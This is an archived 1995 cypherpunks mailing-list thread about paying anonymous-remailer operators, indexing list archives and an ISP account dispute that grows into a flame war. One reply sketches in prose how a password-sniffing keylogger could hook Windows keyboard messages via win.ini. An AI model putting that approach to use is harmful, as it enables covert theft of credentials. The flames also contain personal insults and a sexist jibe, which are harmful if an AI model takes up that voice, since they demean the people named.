He was begging for mercy as little as 4 hours later... How soon they forget. I'm lucky it didn't happen to me. Thanks Tim, for saving my bacon. Nonetheless, I *am* thankful to Jim Gillogly, who sent me a great bunch of stuff about what the pentium.whistleblower, Dr. Nicely, was working on. Jim said he got it out of WWW, and maybe he'll post the URL here and that will be that. Nicely was working with finding multiple primes: Prime twins, prime triplets, etc. I will now proceed to post the relevant bits of Jim's and Tim's stuff to the newsgroup I got "called" in. Thanks to everyone who sent me comments, pointers, etc. >Not to sound strident, but if folks would keep copies of articles and >spend some time organizing them in data bases or in other searchable >forms, this would help the list. In my opinion, having personal access >to past posts is several orders of magnitude more important than >having MIDI-MIME JPEG-II TeX players that can display "Cypherpunks R >Us" in the correct font and with the "R" reversed according to spec. Indeed. Having limited space on my poor PowerBook, I have kept mostly the "execrable e$" types of files, to wit: anything mentioning money, finance, economics, and whatever crypto is specific to those areas. Since I started hanging out here this spring, I've accumulated about 10 megs of stuff between this list and www-buyinfo. I just archived everything from November backwards into Stuffit-compressed Eudora mailboxes. If you want those, I've got 'em. I did search the files I have after the "great squeeze", but to no avail. Unfortunately, I did not think I would have to keep anything to do with Wintel and their potential tribulations. I am, after all a Certified Macintosh Bigot. Thanks again, everyone. 
Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923
From dcwill at python.ee.unr.edu Fri Jan 6 15:19:15 1995 From: dcwill at python.ee.unr.edu (Dr. D.C. Williams) Date: Fri, 6 Jan 95 15:19:15 PST Subject: Remailer Abuse Message-ID: <199501062324.SAA29816@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Jonathan replied: > One thing to keep in mind, though, is that it's really the _last_ remailer > in the chain that's taking the most heat, and it would be nice if they got > paid. Unfortunately, this creates the closest association between specific traffic and paying customers. > There's also an issue of some remailers refusing to be last in the > chain, so they don't expose themselves so much. So the remailers which > _did_ agree to be last in the chain would obviously get used for this > purpose, while the others wouldn't, but they wouldn't get any more money > for it. What's to prevent mail from remailer A sent to remailer B from being sent right back to A for delivery? That's a part of the mixing required for true randomness. I don't know if this is being done now (by Chain or premail), and I'd like to know why. There might well be a good reason I'm not aware of. In order to join the mesh, remailers would be required to accept and ultimately deliver mail to ensure equality among them. I believe that a class of "prime" remailers would arise; these would be the preferred remailers, and their input and output would largely be balanced. This assumes, of course, that "second-class" remailers (those which profit equally but don't deliver as the last unit in the chain) aren't allowed in on an equal basis. Prime operators deserve, and would receive, compensation. 
> They might even get less, since most people probably don't use the > same remailer twice in a chain, so the ones agreeing to be last are hardly > ever going to be first. That seems undesirable. See above. What's the difference between A-->B-->C-->B and A-->B-->C-->D ? If someone is logging messages and routing, it's less secure, but then so is the entire remailer system. Prime remailer operators are those who don't log. Maybe message size would tip off snoopers. This can be overcome with minor tweaking to existing remailer code by tacking on or eliminating padding to messages. But logging still makes the whole system extremely vulnerable. > remailers, since that poses even more exposure to heat, and it would be > nice if ops were compensated for. Agreed. But since the payment "on the way out" (i.e.; a store) is much less desirable (and would probably work to reduce traffic), payment "on the way in" (i.e.; the subway) seems like the preferred alternative. =D.C. Williams - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw3RLCoZzwIn1bdtAQHpYgF/brIk7ssBTsR+26TqW6MifGwz+lymbXlc cYWFzNCJcrbRTgy7zHgPisvk/roHW0Nv =XJAq -----END PGP SIGNATURE-----
From pstemari at erinet.com Fri Jan 6 15:19:20 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Fri, 6 Jan 95 15:19:20 PST Subject: sniff passwords on PC (DOS) Message-ID: <9501062310.AB20311@eri.erinet.com> At 01:00 AM 1/6/95 CST, m00012 at KANGA.STCLOUD.MSUS.EDU wrote: > ... It does not work after starting windows. Not sure, but it seems obvious >that MS windows installs its own keyboard interrupt. ... True, but it's fairly simple to write a program that loads itself in win.ini and also hooks the keyboard messages from Windows. --Paul J. Ste. 
Marie
pstemari at well.sf.ca.us, pstemari at erinet.com

From tengi at Princeton.EDU Fri Jan 6 15:23:33 1995
From: tengi at Princeton.EDU (Christopher J. Tengi)
Date: Fri, 6 Jan 95 15:23:33 PST
Subject: Indexing and searching (was Re: public vs. private replies)
In-Reply-To: <199501062238.RAA29242@bb.hks.net>
Message-ID: <9501062315.AA29835@deepthought.Princeton.EDU>

You may want to take a look at glimpse and harvest. Here are some useful URLs for them:

http://glimpse.cs.arizona.edu:1994/
http://harvest.cs.colorado.edu/

> -----BEGIN PGP SIGNED MESSAGE-----
>
> - -----BEGIN PGP SIGNED MESSAGE-----
>
> In article <199501060807.DAA22166 at bb.hks.net>,
> L. McCarthy wrote:
> >Tim May writes:
> >> In my opinion, having personal access
> >> to past posts is several orders of magnitude more important than
> >> having MIDI-MIME JPEG-II TeX players [...]
> >
> >It takes more disk space from one's personal quota, though (for those who
> >suffer under such restrictions). :[
>
> All posts to cypherpunks since June '94 are available by ftp from
> ftp.hks.net:/cypherpunks/nntp/cypherpunks. They are also available
> via nntp from nntp.hks.net:hks.lists.cypherpunks.
>
> I'd be glad to put a search engine of some sort on them, either by
> Web or by mailserver, if someone can suggest a reasonable way to index
> the whole lot.
> - - --
> Todd Masco | "life without caution/ the only worth living / love for a man/
> cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich
> Cactus' Homepage
>
> - -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
>
> iQCVAwUBLw2LTRNhgovrPB7dAQEDNwP/QTydu0Tp68ytNupes18WU+uv159GJJfE
> Wy+3iLxj+9rbPJwEKBZlXqhkfV7pf4nK9wNwiwNR4ZF13zpCAljWPhw3BEgNM4Xj
> Ity2GWLb8s7PBMplc+ggTQ4LowMYGqoO/e1pBWH3joFCuv11owkf+ZmbvTSZgU7h
> l07wq41l2L0=
> =Ao+S
> - -----END PGP SIGNATURE-----
> - ---
> [This message has been signed by an auto-signing service.
A valid signature
> means only that it has been received at the address corresponding to the
> signature and forwarded.]
>
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: Gratis auto-signing service
>
> iQBFAwUBLw3GJCoZzwIn1bdtAQFdVAF8DB7xxjzPgHNj2Eil0zEuLKj8SofCLFAs
> HBdXBN2fFjT5mNwnKh5a4T1R1Dv0Zp/c
> =6bFr
> -----END PGP SIGNATURE-----
>

From bshantz at spry.com Fri Jan 6 15:35:54 1995
From: bshantz at spry.com (bshantz at spry.com)
Date: Fri, 6 Jan 95 15:35:54 PST
Subject: The Carol Anne Controversy
Message-ID: <199501062336.PAA12592@homer.spry.com>

C'Punks,

Well, folks, this has certainly been an exciting SPAM/FLAME war we've been watching. I've personally enjoyed skipping a good portion of the text of the messages and just watching the headers continue to grow in size as more and more people have been added to the CC list. Although, I must admit that I enjoyed the Winternet Sysadmin's Rebuttal. Between this and Matt's article about being an international arms courier (Great Article Matt!!!) I've discovered my own answer to the Soap Operas I miss while I'm at work every day.

Think I'll go make some popcorn and sit back to watch the fireworks some more.

-- Brad

From pstemari at erinet.com Fri Jan 6 15:37:15 1995
From: pstemari at erinet.com (Paul J. Ste. Marie)
Date: Fri, 6 Jan 95 15:37:15 PST
Subject: Remailer Abuse
Message-ID: <9501062326.AA20655@eri.erinet.com>

At 03:44 PM 1/6/95 -0500, Jonathan Rochkind wrote:
> ... Why? Why wouldn't the FV remailers use settlements? At the end of
>>the month, everyone settles accounts in re who gets what fraction of
>>what. No logs are needed other than counters.
>
> ... 1) The initial remailer has no way of knowing how many subsequent links
>there are in the chain, and so doesn't know if I've paid him enough to
>reimburse everyone else. I can easily cheat. He also doesn't know _who_
>the subsequent chains are.
He can deduct one "stamp" from the amount, and
>forward the rest on to the next remailer, and trust them to do the same,
>but if I'm cheating there won't be enough to make it to the end of the
>chain. Both of these facts (initial op doesn't know how long the chain
>will be, or who will be on it) are essential to the security I get from
>using anon remailers, so even if they could be "fixed", it would be bad to.

No, basically the idea is that each stamp covers an average number of remailer hops. The remailer ops get together, with counts of their ins and outs to each other, and split some fraction of the stamp prices accordingly. They can even determine the average number of hops given the in/out counts. Fairly simple, actually.

--Paul J. Ste. Marie
pstemari at well.sf.ca.us, pstemari at erinet.com

From jim at acm.org Fri Jan 6 15:57:26 1995
From: jim at acm.org (Jim Gillogly)
Date: Fri, 6 Jan 95 15:57:26 PST
Subject: floating point crypto?
In-Reply-To:
Message-ID: <199501062358.PAA22404@mycroft.rand.org>

> rah at shipwright.com (Robert Hettinga) writes:
> Nonetheless, I *am* thankful to Jim Gillogly, who sent me a great bunch of
> stuff about what the pentium.whistleblower, Dr. Nicely, was working on. Jim
> said he got it out of WWW, and maybe he'll post the URL here and that will
> be that. Nicely was working with finding multiple primes: Prime twins,
> prime triplets, etc.

The page is titled "The Pentium Papers": http://www.mathworks.com/README.html

From mpd at netcom.com Fri Jan 6 16:10:51 1995
From: mpd at netcom.com (Mike Duvos)
Date: Fri, 6 Jan 95 16:10:51 PST
Subject: Files and mail
In-Reply-To:
Message-ID: <199501070010.QAA02210@netcom10.netcom.com>

drechsau at winternet.com (Mike Horwath) carefully explains all the reasons why is it better to have a Netcom account than a Winternet account!

> I was going to be in, I decided to rest instead. So sue me
> for it.

Big providers like Netcom have many employees and many machines.
Things do not screech to a halt when "the guy who owns the machine" takes a mental health day. :)

> Talk about net.good.will...you stole service after it was
> suspended.

Free service offered to the public cannot be stolen, even by prior dissatisfied customers. Big providers like Netcom don't care if someone they don't like logs onto the machine again as "guest".

> Tuesday, after being up for 20+ hours and getting a couple
> hours sleep, you call ... Again, sue me, this time for being
> tired.

Service at big providers like Netcom doesn't slack off when "the guy who owns the machine" misses his nap...

> Wednesday, I was going to be into work, which you assumed I
> would be, ... I decided I was going to take that day off ...

...or when "the guy who owns the machine" goes fishing...

> The machine being down was not used as an excuse, but it is
> hard to operate like we used to with only one user machine.

...or when "the machine" is broken.

> That is 2 counts in 2 days (notified on monday, early, of
> the spamming, notified on wed of the mass unsolicited
> mailings). Sorry, someone had to put their foot down, and
> it happened to be us.

Big service providers like Netcom don't interfere with customer use of the resources they sell, except when network functionality is impacted. Even in such cases, they try to reach an understanding with the user, and terminate accounts only as a last resort. Accounts don't vanish when "the guy who owns the machine" decides to throw a tantrum.

> It was inappropriate for the groups that you posted to.

Big providers like Netcom don't pass editorial judgment on the content of material posted by their customers.

> Sorry Carol Anne, but this is a system I administer and I
> use the AUP to protect all of us across the 'net.

I am sure we will all sleep more soundly knowing that Mike Horwath and his tiny pimple of a machine on the Internet are "protecting" us.
> We had talked about the winternet t-shirts and how we would
> use the work you did and the monies you would receive as
> payment.

Big providers like Netcom don't make silly little deals with customers for T-shirts...

> Well, no t-shirts have gone out and at this time, I will be
> cancelling all orders for them and will redesign them and
> have them produced externally to what you have done. This
> is what happens when you hold something over someone's head.

...or cancel those agreements out of spite when they don't get everything done their way.

You know, I used to use BBS systems a great deal before large providers like Netcom began offering personal accounts with Internet access at reasonable rates. A BBS is about as far from a common carrier as one can get, and many Sysops disclaim all your rights under the ECPA, read private mail, forbid the use of PGP, decide what opinions may be expressed on various issues, and boot off any user who questions anything they do. Since the Sysop owns the machine, they are legally within their rights to act like this, and as long as there are enough users who will put up with their behavior, they can run a system.

Now that Unix boxes are not much more expensive than PCs used to be, every asshole in the world who played Sysop on a BBS now envisions himself as Sysadmin of an ISP. So you have an infestation of tiny service providers, running on toy machines, that coast along for a few years until the person running them either goes bankrupt or gets bored. I certainly wouldn't subscribe to one of these services, because the management mentality and problematical service most of them provide is exactly what I came to Netcom to get away from.

Quite frankly, I don't see why Carol doesn't just get a Netcom account and stop quibbling with this twit. Stop letting him waste any more of your time and let him play his administrative power games with newbies who don't know any better.

My two cents.
--
Mike Duvos         $ PGP 2.6 Public Key available $
mpd at netcom.com  $ via Finger.                   $

From jonny at Synopsys.COM Fri Jan 6 16:19:51 1995
From: jonny at Synopsys.COM (Jonny Goldman)
Date: Fri, 6 Jan 95 16:19:51 PST
Subject: Indexing and searching (was Re: public vs. private replies)
In-Reply-To: <9501062315.AA29835@deepthought.Princeton.EDU>
Message-ID: <9501070020.AA01782@philo.synopsys.com>

   Date: Fri, 06 Jan 1995 18:15:40 EST
   From: "Christopher J. Tengi"

   You may want to take a look at glimpse and harvest. Here are some useful URLs for them:

   http://glimpse.cs.arizona.edu:1994/
   http://harvest.cs.colorado.edu/

Both very good systems. Harvest is probably overkill. Glimpse is nice, but I don't know if it handles mail archives (unless they are one-file-per-message).

>
> In article <199501060807.DAA22166 at bb.hks.net>,
> L. McCarthy wrote:
> >Tim May writes:
> >> In my opinion, having personal access
> >> to past posts is several orders of magnitude more important than
> >> having MIDI-MIME JPEG-II TeX players [...]
> >
> >It takes more disk space from one's personal quota, though (for those who
> >suffer under such restrictions). :[
>
> All posts to cypherpunks since June '94 are available by ftp from
> ftp.hks.net:/cypherpunks/nntp/cypherpunks. They are also available
> via nntp from nntp.hks.net:hks.lists.cypherpunks.
>
> I'd be glad to put a search engine of some sort on them, either by
> Web or by mailserver, if someone can suggest a reasonable way to index
> the whole lot.

There used to be a WAIS index of cypherpunks on mariposa, but it doesn't seem to work now. WAIS indexing mail archives is pretty easy.

- Jonny G

From mpd at netcom.com Fri Jan 6 16:20:05 1995
From: mpd at netcom.com (Mike Duvos)
Date: Fri, 6 Jan 95 16:20:05 PST
Subject: All I did was properly crosspost!
In-Reply-To: <9501062310.AB20311@eri.erinet.com>
Message-ID: <199501070020.QAA03416@netcom10.netcom.com>

> The discussion on alt.current-events.net-abuse seemed to indicate that the
> claim of "Just 10" above is a slight understatement. The newsgroups seem to
> have been hit alphabetically, and I believe the total count was in the hundreds.
>
> --Paul J. Ste. Marie
> pstemari at well.sf.ca.us, pstemari at erinet.com

The individual who posted the first hysterical message about Carol's alleged spam in a.c-e.n-a leaped to the conclusion that it was being posted to a large number of groups because one of the newsgroups posted to had a very low ordinal in the alphabetical list of all newsgroups. The message itself, which he quoted, was only cross-posted to the 10 newsgroups specified. I believe the CancelMoose threshold for an official spam is 50 newsgroups.

--
Mike Duvos         $ PGP 2.6 Public Key available $
mpd at netcom.com  $ via Finger.                   $

From cactus at hks.net Fri Jan 6 16:47:38 1995
From: cactus at hks.net (L. Todd Masco)
Date: Fri, 6 Jan 95 16:47:38 PST
Subject: Peter D. Lewis
Message-ID: <199501070053.TAA00768@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Culled from a columbia newsgroup:

>WIRED magazine now has a "Peter Lewis Prize for Bad Internet
>Reporting". Check out: http://www.hotwired.com/Signal/Flux/ where
>they announce the prize each week. Also read the story how Reuters
>muffed up the Microsoft/Catholic Church reporting.

You know it's bad when WIRED accuses you of bad reporting.

- --
Todd Masco | "life without caution/ the only worth living / love for a man/
cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw3l5yoZzwIn1bdtAQHYmwGAmV97gzR8Tcl4b5iWMtRSbxUGKGFjEErS
CNbc4fIyVrRnpUg55T8PSB9RktUn/I5K
=OK63
-----END PGP SIGNATURE-----

From wozzeck at phantom.com Fri Jan 6 17:08:34 1995
From: wozzeck at phantom.com (I'm Wozz)
Date: Fri, 6 Jan 95 17:08:34 PST
Subject: Files and mail
In-Reply-To: <199501070010.QAA02210@netcom10.netcom.com>
Message-ID:

On Fri, 6 Jan 1995, Mike Duvos wrote:

> drechsau at winternet.com (Mike Horwath) carefully explains all the
> reasons why is it better to have a Netcom account than a
> Winternet account!
>
> > I was going to be in, I decided to rest instead. So sue me
> > for it.
>
> Big providers like Netcom have many employees and many machines.
> Things do not screech to a halt when "the guy who owns the
> machine" takes a mental health day. :)
>

no instead things screech to a halt when the 1000th user gets on each client machine

> > Talk about net.good.will...you stole service after it was
> > suspended.
>
> Free service offered to the public cannot be stolen, even by
> prior dissatisfied customers. Big providers like Netcom don't
> care if someone they don't like logs onto the machine again as
> "guest".
>

when she was prohibited from that service because of her actions it is.

> > Tuesday, after being up for 20+ hours and getting a couple
> > hours sleep, you call ... Again, sue me, this time for being
> > tired.
>
> Service at big providers like Netcom doesn't slack off when "the
> guy who owns the machine" misses his nap...
>

no they slack off whenever they get a chance

> > Wednesday, I was going to be into work, which you assumed I
> > would be, ... I decided I was going to take that day off ...
>
> ...or when "the guy who owns the machine" goes fishing...
>

...or when 5 trillion hackers descend on the machine and eat it alive

> > The machine being down was not used as an excuse, but it is
> > hard to operate like we used to with only one user machine.
>
> ...or when "the machine" is broken.
>

...or when "their network" is broken.

> > That is 2 counts in 2 days (notified on monday, early, of
> > the spamming, notified on wed of the mass unsolicited
> > mailings). Sorry, someone had to put their foot down, and
> > it happened to be us.
>
> Big service providers like Netcom don't interfere with customer
> use of the resources they sell, except when network functionality
> is impacted. Even in such cases, they try to reach an
> understanding with the user, and terminate accounts only as a
> last resort. Accounts don't vanish when "the guy who owns the
> machine" decides to throw a tantrum.
>

if a user on netcom violates the AUP, their account would be terminated...if those were the terms of the AUP. It just so happens the AUP of winternet allows for this situation.

its a bit far fetched to call HIS reaction a tantrum.... If anyone's screaming for mommy its whats-her-name....

> > Sorry Carol Anne, but this is a system I administer and I
> > use the AUP to protect all of us across the 'net.
>
> I am sure we will all sleep more soundly knowing that Mike
> Horwath and his tiny pimple of a machine on the Internet are
> "protecting" us.

big is better i guess....

>
> > We had talked about the winternet t-shirts and how we would
> > use the work you did and the monies you would receive as
> > payment.
>
> Big providers like Netcom don't make silly little deals with
> customers for T-shirts...
>

Big providers like Netcom don't have a 'community' to speak of.

> > Well, no t-shirts have gone out and at this time, I will be
> > cancelling all orders for them and will redesign them and
> > have them produced externally to what you have done. This
> > is what happens when you hold something over someone's head.
>
> ...or cancel those agreements out of spite when they don't get
> everything done their way.

uhmm, sounds like the deal was cancelled because she didn't deliver.,..not out of spite

>
> You know, I used to use BBS systems a great deal before large
> providers like Netcom began offering personal accounts with
> Internet access at reasonable rates. A BBS is about as far from
> a common carrier as one can get, and many Sysops disclaim all
> your rights under the ECPA, read private mail, forbid the use of
> PGP, decide what opinions may be expressed on various issues, and
> boot off any user who questions anything they do. Since the
> Sysop owns the machine, they are legally within their rights to
> act like this, and as long as there are enough users who will put
> up with their behavior, they can run a system.

HAhahaha...if you had any idea what you were talking about, you would realize you are totally off base. Winternet is HARDLY a 'bbs'. Its a regional internet service....much as netcom was before they flooded every city with dialups.

Any professional knows better than to read private mail...and if this is so...then they aren't worthy of having a site to run

as for PGP, this is an individual thing....I'm sure mike has no such objections...i know here at MindVox we don't...in fact, we installed it for the users

Who owns netcom's machines?

>
> Now that Unix boxes are not much more expensive than PCs used to
> be, every asshole in the world who played Sysop on a BBS now
> envisions himself as Sysadmin of an ISP. So you have an
> infestation of tiny service providers, running on toy machines,
> that coast along for a few years until the person running them
> either goes bankrupt or gets bored. I certainly wouldn't
> subscribe to one of these services, because the management
> mentality and problematical service most of them provide is
> exactly what I came to Netcom to get away from.
>

Once again, you speaketh from your ass....
Netcom is an abomination.....it is the only one of its kind (not counting delphi etc, since they were conceived under different systems)

Netcom is a Winternet which has grown out of control. They suck network services off others (irc as one example) and don't take responsibility for the HUGE number of idiots on their service who maliciously hack anything they can reach....its totally without personality...AND....its slower than molasses...the management is out of touch with the users and they are so overloaded with trouble reports, they don't know what to do with them.

> Quite frankly, I don't see why Carol doesn't just get a Netcom
> account and stop quibbling with this twit. Stop letting him
> waste any more of your time and let him play his administrative
> power games with newbies who don't know any better.

Yes....join them carol
join them.... join them.... join them....
be like us.... be like us.... be like us....
we will care for your every need.... we will care for your every need.... we will care for your every need....
look deep into my eyes.... look deep into my eyes.... look deep into my eyes....

This has got to be one of the largest loads of crap I've seen tossed on this list in the year and a half i've lurked on it.

I'd love to see a response to this...please!

oh...btw...i don't have ANY connection to winternet, other than knowing MANY satisfied customers, and having heard a lot about them, as a sysadmin for a site in much the same situation.

   ,   /\_-\(:::::::::)/\_-\   matthew e. cable - systems administrator
 .   . <((_))  MindVox  ((_))> phantom access technologies inc
   .   \- \/(:::::::::)\- \/   wozzeck at phantom.com

From nobody at replay.com Fri Jan 6 17:26:41 1995
From: nobody at replay.com (Name withheld on request)
Date: Fri, 6 Jan 95 17:26:41 PST
Subject: No Subject
In-Reply-To: <199501062336.PAA12592@homer.spry.com>
Message-ID: <199501070127.AA00746@xs1.xs4all.nl>

> Think I'll go make some popcorn and sit back to watch the fireworks some more.

(giggle) (giggle) (giggle) (giggle)

Me, too.

Love always,
Carole Anne Buttock

P.S. Someone with a clue: please help me get a life. Only 10 cross posts!!!

From roy at cybrspc.mn.org Fri Jan 6 18:07:47 1995
From: roy at cybrspc.mn.org (Roy M. Silvernail)
Date: Fri, 6 Jan 95 18:07:47 PST
Subject: Remailer Abuse
In-Reply-To:
Message-ID: <950106.173231.9X3.rusnews.w165w@cybrspc.mn.org>

-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, jrochkin at cs.oberlin.edu writes:

> At 3:12 PM 01/06/95, Russell Nelson wrote:
>>Why? Why wouldn't the FV remailers use settlements? At the end of
>>the month, everyone settles accounts in re who gets what fraction of
>>what. No logs are needed other than counters.
>
> Oh, you're suggesting that I'd only actually pay the first remailer on my
> chain, and at the end of the month he'd pay some of the money I (and
> others) paid him to all of the other remailers he transacted with over the
> month? I hadn't thought of that, but now that I do, I can see several
> problems arising.

This might not be as much of a problem as you think. Given that there will likely be a mixture of free and pay remailers, and that a given message may chain through one or more of either type, why not place the stamp for each pay remailer inside the encrypted sub-packet which that mailer will receive?

Think of each remailer as an independent post office. For each pay remailer, you need one stamp. Ideally, each stamp would be a bit less expensive, but since remailers don't need to share their revenue, that shouldn't be much problem.

An intelligent chainer (Chain++, maybe?) could keep track of your postage and put the stamps in the proper inner envelopes. This would work best if all the pay remailers accepted a common brand of stamp.

- --
Roy M.
Silvernail [ ] roy at cybrspc.mn.org
PGP public key available by mail echo /get /pub/pubkey.asc | mail file-request at cybrspc.mn.org
These are, of course, my opinions (and my machines)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLw3VrBvikii9febJAQFozwQAkYUBp9Uc5Lbmc4udL7hwTgBY9I+yfKdy
wvW5xl4TeTeJLAS95yHOyiEKP/nVsjfknr4gx1mOrFZYOxkNRJa78YeQ8tDAVq7Y
S1UQrYqHJAoi/AKdypufIaeu8iF/1pVbYLDdIbbQm3bxlUZHwciYJUvnneRjFbhA
BJB+ruqzEMs=
=CGFS
-----END PGP SIGNATURE-----

From jamesd at netcom.com Fri Jan 6 18:12:40 1995
From: jamesd at netcom.com (James A. Donald)
Date: Fri, 6 Jan 95 18:12:40 PST
Subject: Files and mail
In-Reply-To: <199501070010.QAA02210@netcom10.netcom.com>
Message-ID:

On Fri, 6 Jan 1995, Mike Duvos wrote:

>
> drechsau at winternet.com (Mike Horwath) carefully explains all the
> reasons why is it better to have a Netcom account than a
> Winternet account!
>
> > I was going to be in, I decided to rest instead. So sue me
> > for it.

(Long hilarious list of Mike Horwath's totally unprofessional behavior deleted. To save bandwidth, just read it twice, or better still three times.)

> [Netcom] accounts don't vanish when "the guy who owns the
> machine" decides to throw a tantrum.
>
> [...]
>

A big problem with Netcom is that it has no web server, and its ftp server is totally overwhelmed.

I use nw.com for my web pages and netcom for everything else.

Big bandwidth webservice at reasonable rates

Does anyone have a better suggestion?

I have been shopping around for a reasonably priced 28KB SLIP connection. Have not found one yet.

---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we     James A. Donald
are. True law derives from this right, not from
the arbitrary power of the omnipotent state.
jamesd at netcom.com

From mpd at netcom.com Fri Jan 6 18:12:43 1995
From: mpd at netcom.com (Mike Duvos)
Date: Fri, 6 Jan 95 18:12:43 PST
Subject: Files and mail
In-Reply-To:
Message-ID: <199501070212.SAA19162@netcom3.netcom.com>

"I'm Wozz" writes:

[miscellaneous Netcom-honking elided]

> It just so happens the AUP of winternet allows for this
> situation.

Right. And a small service provider can make any "terms of service agreement" his or her little heart desires. Just like the owner of a two line BBS. With big service providers, such things tend to be done in a somewhat more business-like fashion.

> its a bit far fetched to call HIS reaction a tantrum.... If
> anyone's screaming for mommy its whats-her-name....

Well, if I posted a message to 10 newsgroups and some bozo posted a message to a.c-e.n-a falsely implying that it was the beginning of some sort of massive spam, I would certainly not be pleased.

If Netcom, after receiving some small amount of flamage on the subject, summarily removed access to my account and made themselves unavailable for several days when I tried to contact them to discuss the matter, and then tossed me off with a flippant "so sue me" when I protested, I would be even less pleased.

Fortunately, I can't imagine Netcom even caring about a 10 newsgroup cross-post.

> big is better i guess....

In the case of Internet Service Providers, big is definitely better. There are simply economies of scale which are not realized with smaller operations. Netcom has had some problems, but almost all of them were growth related. None of them were intrinsic to the systems and network itself.

> Winternet is HARDLY a 'bbs'. Its a regional internet
> service....much as netcom was before they flooded every
> city with dialups.

Read again, this time for comprehension. I did not say Winternet was a BBS. Merely that smaller ISPs have many of the undesirable characteristics found in BBS systems.
> Any professional knows better than to read private
> mail...and if this is so...then they aren't worthy of having
> a site to run

For legal purposes, most BBS systems declare that for the purposes of the ECPA, there is no such thing as private mail on their system. The Sysop is then free to read anything he wishes to. This policy is clearly stated in the user agreements of almost all BBS systems offering access to the public.

> as for PGP, this is an individual thing....I'm sure mike
> has no such objections...i know here at MindVox we
> don't...in fact, we installed it for the users

Many BBS Sysops forbid PGP and kick users off their systems who use it. They cite fears of encrypted illegal porn and credit card numbers passing through their systems, and potential legal liability.

> Netcom is an abomination.....it is the only one of its kind
> (not counting delphi etc, since they were conceived under
> different systems)

Netcom is the fastest growing and leading Internet Service Provider. Their ability to attract new customers is limited only by the rate at which they are able to increase capacity. Their respect for freedom of expression is absolute and they do not meddle in their customers' affairs. Their prices are reasonable and their user agreement is fair. Works for me. :)

> They suck network services off others (irc as one example)
> and don't take responsibility for the HUGE number of idiots
> on their service who maliciously hack anything they can
> reach....its totally without personality...AND....its slower
> than molasses...the management is out of touch with the
> users and they are so overloaded with trouble reports, they
> don't know what to do with them.

Perhaps an exaggerated description of Netcom a few months ago, but certainly not the current state of affairs. I always get a line when I dial in, response time is reasonable, disk is abundant, and almost all software is available. Speed of network connections to other sites is quite acceptable.
> This has got to be one of the largest loads of crap I've
> seen tossed on this list in the year and a half i've lurked
> on it.

Everyone is certainly entitled to an opinion, which, in the words of Robert Blake, is one of the two things all humans have. :)

> oh...btw...i don't have ANY connection to winternet, other
> than knowing MANY satisfied customers, and having heard
> a lot about them, as a sysadmin for a site in much the same
> situation.

The number of satisfied customers is not the measure of a site, any more than the number of people still alive is the measure of a disease.

Netcom works with the reliability of the phone company. It is always there, almost always up, and is redundant enough that when something breaks, it is still usable. I pay my $19.50 a month and I get unlimited everything. I'm happy.

--
Mike Duvos         $ PGP 2.6 Public Key available $
mpd at netcom.com  $ via Finger.                   $

From jamesd at netcom.com Fri Jan 6 18:26:04 1995
From: jamesd at netcom.com (James A. Donald)
Date: Fri, 6 Jan 95 18:26:04 PST
Subject: Files and mail
In-Reply-To:
Message-ID:

On Fri, 6 Jan 1995, I'm Wozz wrote:

> >
> > Big providers like Netcom have many employees and many machines.
> > Things do not screech to a halt when "the guy who owns the
> > machine" takes a mental health day. :)
> >
>
> no instead things screech to a halt when the 1000th user gets on each
> client machine

When Netcom slows down, this is not because the asshole in charge is being an asshole.

He may well be an asshole, but the size of netcom protects me from having to discover this.

This is good for my mental health.

> >
> I'd love to see a response to this...please!

You are totally full of shit.

Mike Horwath was arrogant and unprofessional.

The problems you describe with Netcom's service are entirely accurate. I am looking for a better solution. Submitting to the authority of an arrogant and incompetent fool does not seem like a good solution.

He is plainly a fool, because if I had acted as he has acted, I would certainly not post this all over the place.

Until he posted, I had assumed that Carol was having a hissy fit, that she was premenstrual or something. Now I see why she is upset.

---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we     James A. Donald
are. True law derives from this right, not from
the arbitrary power of the omnipotent state.         jamesd at netcom.com

From eric at remailer.net Fri Jan 6 18:31:50 1995
From: eric at remailer.net (Eric Hughes)
Date: Fri, 6 Jan 95 18:31:50 PST
Subject: for-pay remailers and FV
In-Reply-To:
Message-ID: <199501070231.SAA20999@largo.remailer.net>

This whole fracas between blind-sig money and FV money is a symptom of the confusion between clearing and settlement.

Roughly speaking, clearing is when authorization moves (i.e. a liability is created), and settlement is when money moves (i.e. when that liability is discharged). Clearing should always happen at or before settlement.

In order to do on-line digital postage, you need clearing to happen at the point of remailing. Settlement can happen at some later time.

Settlement need not be in real money. The liability of other settlement facilities can be used. This is in fact how central banking works. Only the central bank moves "actual" funds; everyone else moves liabilities around.

To wit, a remailer consortium would do best to issue a local banknote usable only by themselves and have customers settle with the consortium issuer, rather than any member of the consortium itself. If the consortium issuer were to use blind sigs, the consortium members wouldn't be able to ascertain who paid.

The mechanism for settlement could be credit cards directly, mailed in checks, even FV. The preferences of the consortium members for issues of timeliness of settlement, reversibility, loss sharing, etc.
would decide the actual choice of settlement mechanism.

Eric

From jamesd at netcom.com Fri Jan 6 18:44:27 1995
From: jamesd at netcom.com (James A. Donald)
Date: Fri, 6 Jan 95 18:44:27 PST
Subject: for-pay remailers and FV
In-Reply-To: <199501070231.SAA20999@largo.remailer.net>
Message-ID:

On Fri, 6 Jan 1995, Eric Hughes wrote:
> This whole fracas between blind-sig money and FV money is a symptom of
> the confusion between clearing and settlement.

